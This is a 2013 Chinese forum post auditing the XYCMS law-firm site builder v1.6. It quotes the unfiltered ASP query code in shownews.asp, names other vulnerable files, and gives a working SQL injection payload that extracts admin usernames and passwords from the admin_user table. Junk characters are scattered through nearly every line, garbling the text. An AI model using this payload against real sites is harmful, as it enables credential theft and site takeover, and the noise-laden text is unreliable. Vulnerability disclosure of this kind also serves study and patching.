前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似& y9 b1 u" T4 @9 R
, z$ X2 A d6 _. X淫荡分割线% p3 ~' T7 B9 s3 R s; S7 G
--------------------------------------------------------5 \1 e1 @+ f5 f. U( g( T) H
! f/ V# R0 G" q7 B
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)4 k: f4 o: _5 ^; F
源码地址:http://down.chinaz.com/soft/29233.htm# v. S7 v$ p% u; ^* T
0 b d8 ~3 k# s! w3 a9 C! ]3 M漏洞文件:shownews.asp2 h8 v2 n* K+ E0 k _, e+ G
漏洞代码:7-13行4 v) I- Z( D& v: r4 g: n
' O) \4 I/ T5 [# o# ?
0 `$ C5 j* p# A. l3 x<%
3 u6 V$ @4 m% z* B& K% G4 ~id=request.QueryString("id"). [3 s, e/ x( u) G! ]/ m% B% O! F
% G+ r6 I! z, Q) Y0 W. `2 r+ `/ {set snews=server.createobject("adodb.recordset") 8 ]$ U3 ^, G- Z l+ D. n* q$ y
exec="select * from [news] where id="&id
5 a0 W) c' Z6 \# F7 qsnews.open exec,conn,1,1+ [8 L7 Q+ c, N- S5 X
%>: g: I5 c6 w) e
. J& A# e) P2 |
0 i4 w. F9 o% e1 E6 r3 J% F什么过滤都没有 直造成注入
8 |! k* b5 U5 Y' a, q# E
W& P5 f/ r6 o, i( N注入点:http://127.0.0.1:99/shownews.asp?id=xx3 f7 M7 Z7 t2 v3 m" V
7 ]8 q: B' A! b4 g- }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找! L0 V; c3 Q: R' D% `/ }/ O4 I g
+ ~4 w7 y+ D5 o8 T3 F8 a
- r( S/ g: E0 H. r4 Zexp: union select 1,admin,password,4,5,7 from admin_user/ r# o6 O5 |" b) B+ v Y& K
, n4 ]' B- y! s+ \5 _& o; ~
|
发表于 2013-4-4 17:28:12
收藏
支持
反对